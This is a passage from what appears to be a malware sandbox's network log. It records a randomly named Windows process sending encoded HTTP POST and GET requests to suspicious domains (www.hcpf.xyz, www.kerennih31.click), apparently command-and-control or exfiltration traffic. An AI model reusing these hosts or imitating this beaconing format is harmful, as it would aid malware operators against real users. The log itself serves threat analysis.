                                                                                                                            Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 4b 6b db 40 10 be 1b fc 1f 36 32 b9 59 5a 49 4e d2 5a 92 05 ad 93 90 42 d2 86 c6 7d 1d d7 d2 da 5a aa 57 a5 8d 2d d7 e4 c7 94 dc 4a 2f 79 d1 80 d3 06 1a 13 48 0e 81 b8 09 bd b4 f4 dc 43 0f 4d 0f 85 be 28 2b c9 b2 13 42 57 a0 d9 c7 37 df 7c 33 3b ab 4d cc de ab d6 9e 2c cf 01 8b 3a 36 58 7e 70 7b f1 4e 15 70 3c 84 8f 4a 55 08 67 6b b3 e0 f1 42 6d 69 11 48 82 08 56 68 40 0c 0a e1 dc 5d 0e 70 16 a5 be 02 61 bb dd 16 da 25 c1 0b 9a b0 76 1f 46 8c 45 62 6e e9 94 0f 63 1f c1 a4 26 a7 e7 73 5a 1c 25 72 6c 37 ac 5c c3 20 95 cb e5 c4 31 01 63 64 32 eb 60 8a 00 43 f3 f8 d9 2a 69 55 b8 aa e7 52 ec 52 be d6 f1 31 07 8c 64 55 e1 28 8e 28 64 de 2a 30 2c 14 84 98 56 9a 75 b9 24 c9 1c 64 34 94 50 1b eb 53 e2 14 e0 c1 f9 60 b3 b7 f3 e6 a4 bf f7 b7 77 d1 df 7f b7 f7 62 5d 83 c9 79 3e a7 85 b4 63 63 40 3b 3e 4e 39 8d 30 8c 05 4d f0 7c 3e 57 f7 cc 4e d7 41 41 93 b8 8a a8 36 3c 97 f2 21 79 8e 15 e1 06 76 92 65 03 39 c4 ee 28 0f 71 60 22 17 15 c1 ad 80 20 bb 08 16 b0 dd [TRUNCATED]
                                                                                                                            Data Ascii: 2c5|SKk@62YZINZB}ZW-J/yHCM(+BW7|3;M,:6X~p{Np<JUgkBmiHVh@]pa%vFEbnc&sZ%rl7\ 1cd2`C*iURR1dU((d*0,Vu$d4PS`wb]y>cc@;>N90M|>WNAA6<!yve9(q`" B|PxUTsPbi@# 7G,;/SQ3ag{Rg|<bW(b[G8(
                                                                                                                            Oct 19, 2024 12:57:19.980705976 CEST279INData Raw: 66 6e 05 76 61 38 e8 b6 89 49 2d a5 3c 33 99 c5 48 5d 86 c9 cc f8 11 90 27 41 62 2e d5 8c a3 01 ae af 1a 16 a6 60 69 85 2b 82 ac 86 63 15 1b cb 2c 9f 1b 95 8f 4f f7 a7 e3 c1 92 2e a4 9d d1 bd 24 43 9e 54 7d 2f 24 94 78 ae 12 60 1b 51 d2 c2 0c 2d
                                                                                                                            Data Ascii: fnva8I-<3H]'Ab.`i+c,O.$CT}/$x`Q-hYD\tO=_GYb<<k V<67k'fMpI9]$o?|%4Ik*fMFa2tmQ4KCT?/7v[_Nw~m.?}:?)J&


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.449858172.67.181.186803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:21.651331902 CEST871OUTPOST /uy9i/ HTTP/1.1
                                                                                                                            Host: www.hcpf.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.hcpf.xyz
                                                                                                                            Referer: http://www.hcpf.xyz/uy9i/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 4e 35 67 6e 38 51 73 30 37 7a 6e 73 6d 4a 38 4d 78 73 59 4d 44 71 61 2b 6e 49 74 35 63 56 38 4e 44 43 37 79 32 54 76 45 59 6f 70 2b 6a 6c 67 73 42 71 79 61 6e 30 72 44 73 6a 6a 4f 62 67 49 65 56 75 49 61 45 5a 59 46 6b 44 44 61 39 65 5a 31 55 67 5a 4d 4d 69 2f 6e 6e 43 7a 47 79 2b 35 31 4e 71 58 56 78 57 74 72 6c 73 79 34 73 46 30 33 56 30 4d 42 5a 58 34 33 64 52 62 31 66 73 71 75 75 4e 35 44 30 32 36 53 6e 30 4c 2f 38 6a 33 48 56 69 34 6f 37 51 70 36 34 59 71 4f 36 77 46 4a 36 6a 4f 32 31 7a 67 2b 79 6e 45 42 56 51 31 37 6c 65 70 67 51 31 59 4b 76 54 67 4f 61 74 54 64 44 74 74 64 73 7a 34 47 64 77 5a 47 6e 33 65 55 66 31 72 55 30 37 51 3d
                                                                                                                            Data Ascii: 2BWDG=N5gn8Qs07znsmJ8MxsYMDqa+nIt5cV8NDC7y2TvEYop+jlgsBqyan0rDsjjObgIeVuIaEZYFkDDa9eZ1UgZMMi/nnCzGy+51NqXVxWtrlsy4sF03V0MBZX43dRb1fsquuN5D026Sn0L/8j3HVi4o7Qp64YqO6wFJ6jO21zg+ynEBVQ17lepgQ1YKvTgOatTdDttdsz4GdwZGn3eUf1rU07Q=
                                                                                                                            Oct 19, 2024 12:57:22.531109095 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:22 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kk0aOoI3qPpWVp5RmmHPPHv%2BRbQyye3w3VaIk6m0grob2oM%2F0glOLi8lvyZjNHnVFWx5Tay9yoJTlGxFzMVzHU5lesQMjJtO7i1fFisjGk61zIu9OnQ6j6tfJ3HF%2Bq8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d503f319fc42e24-DFW
                                                                                                                            Content-Encoding: gzip
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1379&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=871&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Raw: 32 62 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 4b 6b db 40 10 be 1b fc 1f 36 32 b9 59 5a 49 4e d2 5a 92 05 ad 93 90 42 d2 86 c6 7d 1d d7 d2 da 5a aa 57 a5 8d 2d d7 e4 c7 94 dc 4a 2f 79 d1 80 d3 06 1a 13 48 0e 81 b8 09 bd b4 f4 dc 43 0f 4d 0f 85 be 28 2b c9 b2 13 42 57 a0 d9 c7 37 df 7c 33 3b ab 4d cc de ab d6 9e 2c cf 01 8b 3a 36 58 7e 70 7b f1 4e 15 70 3c 84 8f 4a 55 08 67 6b b3 e0 f1 42 6d 69 11 48 82 08 56 68 40 0c 0a e1 dc 5d 0e 70 16 a5 be 02 61 bb dd 16 da 25 c1 0b 9a b0 76 1f 46 8c 45 62 6e e9 94 0f 63 1f c1 a4 26 a7 e7 73 5a 1c 25 72 6c 37 ac 5c c3 20 95 cb e5 c4 31 01 63 64 32 eb 60 8a 00 43 f3 f8 d9 2a 69 55 b8 aa e7 52 ec 52 be d6 f1 31 07 8c 64 55 e1 28 8e 28 64 de 2a 30 2c 14 84 98 56 9a 75 b9 24 c9 1c 64 34 94 50 1b eb 53 e2 14 e0 c1 f9 60 b3 b7 f3 e6 a4 bf f7 b7 77 d1 df 7f b7 f7 62 5d 83 c9 79 3e a7 85 b4 63 63 40 3b 3e 4e 39 8d 30 8c 05 4d f0 7c 3e 57 f7 cc 4e d7 41 41 93 b8 8a a8 36 3c 97 f2 21 79 8e 15 e1 06 76 92 65 03 39 c4 ee 28 0f 71 60 22 17 15 c1 ad 80 20 bb 08 16 b0 dd [TRUNCATED]
                                                                                                                            Data Ascii: 2b9|SKk@62YZINZB}ZW-J/yHCM(+BW7|3;M,:6X~p{Np<JUgkBmiHVh@]pa%vFEbnc&sZ%rl7\ 1cd2`C*iURR1dU((d*0,Vu$d4PS`wb]y>cc@;>N90M|>WNAA6<!yve9(q`" B|PxUTsPbi@# 7G,;/SQ3ag{Rg|<bW(b[G8(fnva8
                                                                                                                            Oct 19, 2024 12:57:22.531152010 CEST276INData Raw: 89 49 2d a5 3c 33 99 c5 48 5d 86 c9 cc f8 11 90 27 41 62 2e d5 8c a3 01 ae af 1a 16 a6 60 69 85 2b 82 ac 86 63 15 1b cb 2c 9f 1b 95 8f 4f f7 a7 e3 c1 92 2e a4 9d d1 bd 24 43 9e 54 7d 2f 24 94 78 ae 12 60 1b 51 d2 c2 0c 2d a4 68 9e 59 44 5c 1c 74
                                                                                                                            Data Ascii: I-<3H]'Ab.`i+c,O.$CT}/$x`Q-hYD\tO=_GYb<<k V<67k'fMpI9]$o?|%4Ik*fMFa2tmQ4KCT?/7v[_Nw~m.?}:?)J&Egvx


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.449873172.67.181.186803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:24.191217899 CEST10953OUTPOST /uy9i/ HTTP/1.1
                                                                                                                            Host: www.hcpf.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.hcpf.xyz
                                                                                                                            Referer: http://www.hcpf.xyz/uy9i/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 4e 35 67 6e 38 51 73 30 37 7a 6e 73 6d 4a 38 4d 78 73 59 4d 44 71 61 2b 6e 49 74 35 63 56 38 4e 44 43 37 79 32 54 76 45 59 6f 78 2b 6a 54 63 73 41 4a 71 61 6d 30 72 44 6c 44 6a 50 62 67 49 35 56 71 64 64 45 5a 55 56 6b 46 48 61 2f 39 52 31 44 46 31 4d 47 69 2f 6e 34 79 7a 44 34 65 35 38 4e 71 48 52 78 57 39 72 6c 73 79 34 73 45 6b 33 63 46 4d 42 4a 6e 34 30 61 52 62 70 49 38 71 4b 75 4e 67 32 30 32 75 43 6d 45 72 2f 38 44 6e 48 54 55 4d 6f 35 77 70 34 2f 59 71 73 36 77 59 4a 36 6a 53 51 31 7a 56 56 79 67 6b 42 58 31 34 66 68 76 31 2b 50 57 6f 6c 33 42 39 30 62 38 36 63 4c 4e 59 6d 6f 78 77 44 50 68 74 37 6c 6b 4c 6c 4c 48 58 51 76 65 62 78 55 4a 63 68 30 35 76 43 38 4e 4c 74 46 6d 6c 55 41 49 42 47 6b 6c 55 61 77 59 7a 63 4e 76 6a 4d 39 6d 41 71 73 71 52 68 62 54 33 74 71 47 51 73 6f 74 51 34 69 2f 51 6e 79 38 6e 53 71 45 72 4f 4d 78 77 74 6b 4e 73 57 36 38 34 36 2f 43 76 6c 66 43 7a 35 73 4b 55 70 71 7a 6e 2f 78 4f 67 4a 54 66 32 6e 31 44 36 77 6e 5a 41 4f 78 44 31 57 54 77 4a 6a [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=N5gn8Qs07znsmJ8MxsYMDqa+nIt5cV8NDC7y2TvEYox+jTcsAJqam0rDlDjPbgI5VqddEZUVkFHa/9R1DF1MGi/n4yzD4e58NqHRxW9rlsy4sEk3cFMBJn40aRbpI8qKuNg202uCmEr/8DnHTUMo5wp4/Yqs6wYJ6jSQ1zVVygkBX14fhv1+PWol3B90b86cLNYmoxwDPht7lkLlLHXQvebxUJch05vC8NLtFmlUAIBGklUawYzcNvjM9mAqsqRhbT3tqGQsotQ4i/Qny8nSqErOMxwtkNsW6846/CvlfCz5sKUpqzn/xOgJTf2n1D6wnZAOxD1WTwJjI/Rjm8D7HuQcU4udUCQWbW2eADufctcFbxFCZQuUCaB1teIYxuKdR9XvsXKU7o9k2FTeC7gHfTKlfb429DIPGDDNxSbEBaJtYV41J3/72BDfhNG5xO0FyB9U1VtnpHqcvrwRbeOksiyB/XC9UQ7zRSbyld4z6vV8KAReK5NryIfn8J+efL9op+Q+0upjBkIW+tCFf3ZBPui+eljQGObfCPf6EOdXDtfckwmB7alXdgOmVfCl9MEkGRxS0aZEwakpMjRckvLZt+jB5okDVuGb9jBmg3A339ChUU8/B40WvyUiEIlePDmArSPcZODJ50aNajR0xkC02F+xIR6tMerv9ZV8o8D221QvNMP3Y3e1KH85Zkn/pCdZyQkkwMntJy+CW9vrvcaMKd+sO7jvvOvAEHdpOC8nC36JfhMj+pWzfhKgU9c2+x++b2ra2VC0r6sZbSenvyng2h8xNJiVTk6KWm/2hMGGiCcXvX/InULdy8f0RA4d7jS/d9aaQwv9JvYkzcAw2aw29WHMLKLiu6LogMTQ68TwNgcqKDkvwdEd4FgZwZITPGItYFvFNtTkZsUfC2wZtQEu91+ZVXnte56WsMUT0Fyk4yJQmUa8tl+U9ql02UrtY5CLHPz6ci4qIIfaj6tPVGwxGDx2O9+nFShtTOKmTrdIir7e3s [TRUNCATED]
                                                                                                                            Oct 19, 2024 12:57:25.081526995 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:25 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goE3%2BRYobqylU7ctcI36hS1eL5y24WeXlhauy2UrQ2dsijJgI34Xyl6OTCdd50PVcdJ68772faGy%2Bvhd2GVV82iKGtTWcrOWmcFuMWC0jL157cSL736%2BMFwL5DW%2F4iI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d503f418f550baf-DFW
                                                                                                                            Content-Encoding: gzip
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1143&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10953&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 4b 6b db 40 10 be 1b fc 1f 36 32 b9 59 5a 49 4e d2 5a 92 05 ad 93 90 42 d2 86 c6 7d 1d d7 d2 da 5a aa 57 a5 8d 2d d7 e4 c7 94 dc 4a 2f 79 d1 80 d3 06 1a 13 48 0e 81 b8 09 bd b4 f4 dc 43 0f 4d 0f 85 be 28 2b c9 b2 13 42 57 a0 d9 c7 37 df 7c 33 3b ab 4d cc de ab d6 9e 2c cf 01 8b 3a 36 58 7e 70 7b f1 4e 15 70 3c 84 8f 4a 55 08 67 6b b3 e0 f1 42 6d 69 11 48 82 08 56 68 40 0c 0a e1 dc 5d 0e 70 16 a5 be 02 61 bb dd 16 da 25 c1 0b 9a b0 76 1f 46 8c 45 62 6e e9 94 0f 63 1f c1 a4 26 a7 e7 73 5a 1c 25 72 6c 37 ac 5c c3 20 95 cb e5 c4 31 01 63 64 32 eb 60 8a 00 43 f3 f8 d9 2a 69 55 b8 aa e7 52 ec 52 be d6 f1 31 07 8c 64 55 e1 28 8e 28 64 de 2a 30 2c 14 84 98 56 9a 75 b9 24 c9 1c 64 34 94 50 1b eb 53 e2 14 e0 c1 f9 60 b3 b7 f3 e6 a4 bf f7 b7 77 d1 df 7f b7 f7 62 5d 83 c9 79 3e a7 85 b4 63 63 40 3b 3e 4e 39 8d 30 8c 05 4d f0 7c 3e 57 f7 cc 4e d7 41 41 93 b8 8a a8 36 3c 97 f2 21 79 8e 15 e1 06 76 92 65 03 39 c4 ee 28 0f 71 60 22 17 15 c1 ad 80 20 bb 08 16 b0 dd [TRUNCATED]
                                                                                                                            Data Ascii: 2c5|SKk@62YZINZB}ZW-J/yHCM(+BW7|3;M,:6X~p{Np<JUgkBmiHVh@]pa%vFEbnc&sZ%rl7\ 1cd2`C*iURR1dU((d*0,Vu$d4PS`wb]y>cc@;>N90M|>WNAA6<!yve9(q`" B|PxUTsPbi@# 7G,;/SQ3ag{Rg|<bW(b[G8(fn
                                                                                                                            Oct 19, 2024 12:57:25.081568003 CEST276INData Raw: 76 61 38 e8 b6 89 49 2d a5 3c 33 99 c5 48 5d 86 c9 cc f8 11 90 27 41 62 2e d5 8c a3 01 ae af 1a 16 a6 60 69 85 2b 82 ac 86 63 15 1b cb 2c 9f 1b 95 8f 4f f7 a7 e3 c1 92 2e a4 9d d1 bd 24 43 9e 54 7d 2f 24 94 78 ae 12 60 1b 51 d2 c2 0c 2d a4 68 9e
                                                                                                                            Data Ascii: va8I-<3H]'Ab.`i+c,O.$CT}/$x`Q-hYD\tO=_GYb<<k V<67k'fMpI9]$o?|%4Ik*fMFa2tmQ4KCT?/7v[_Nw~m.?}:?)J&E


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.449888172.67.181.186803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:26.733472109 CEST591OUTGET /uy9i/?2BWDG=A7IH/mkAt1Xlqot58OI0S8+25JAud1UhEF7OmTb3ULNYiQ53L6C3hDLglTjiGws4A/oSTbY/vB+Y5OcBKWIDb0nFjD7/puJZKInM70o9vL6/qU8mcXMhaE0=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.hcpf.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:57:27.617151976 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:27 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Yp%2BuPXk4Ewivba0Thsmx5AiY0fPiprTwwnECdc69L2I%2BN7Uj06ID9pfnUoNN%2B6Ztv4UBnUMRAQiky2Rj7%2B%2BNpECYqDhE2XdzIzjhwaDTRY88QIjqYkSQBWow%2FIUGzQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d503f5168b46c10-DFW
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1154&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=591&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Raw: 34 38 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 [TRUNCATED]
                                                                                                                            Data Ascii: 48b<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4e
                                                                                                                            Oct 19, 2024 12:57:27.617203951 CEST707INData Raw: 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a
                                                                                                                            Data Ascii: m;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;b


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.449919104.223.44.195803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:32.919644117 CEST875OUTPOST /czzt/ HTTP/1.1
                                                                                                                            Host: www.kerennih31.click
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.kerennih31.click
                                                                                                                            Referer: http://www.kerennih31.click/czzt/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 48 43 69 6d 37 6f 72 30 65 6c 4e 4f 55 79 38 42 31 53 63 38 7a 42 44 77 46 37 2b 4c 57 43 61 2b 6b 35 74 57 38 6b 74 75 78 54 4f 76 4c 62 55 68 4c 77 56 67 50 75 50 73 46 55 49 39 41 4a 58 47 4c 48 71 2b 6c 70 70 63 42 54 5a 55 50 6c 7a 4d 6b 5a 73 5a 37 79 61 7a 58 70 65 43 2b 43 6c 61 6e 42 43 4a 2b 4e 48 59 56 36 44 72 52 6e 31 79 6b 31 4a 4e 62 44 62 7a 45 65 38 34 71 71 4f 73 41 6c 31 34 44 50 38 65 38 45 4f 47 77 66 42 6a 55 59 6d 50 44 6b 74 4b 76 2b 69 47 53 77 34 51 64 38 31 75 78 6a 31 62 75 4b 4a 65 4e 77 34 30 6b 41 4f 51 43 4d 64 75 49 35 59 73 69 56 33 2f 61 51 3d 3d
                                                                                                                            Data Ascii: 2BWDG=HCim7or0elNOUy8B1Sc8zBDwF7+LWCa+k5tW8ktuxTOvLbUhLwVgPuPsFUI9AJXGLHq+lppcBTZUPlzMkZsZ7yazXpeC+ClanBCJ+NHYV6DrRn1yk1JNbDbzEe84qqOsAl14DP8e8EOGwfBjUYmPDktKv+iGSw4Qd81uxj1buKJeNw40kAOQCMduI5YsiV3/aQ==
                                                                                                                            Oct 19, 2024 12:57:33.502212048 CEST1033INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Sat, 19 Oct 2024 10:57:33 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.449935104.223.44.195803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:35.471951962 CEST895OUTPOST /czzt/ HTTP/1.1
                                                                                                                            Host: www.kerennih31.click
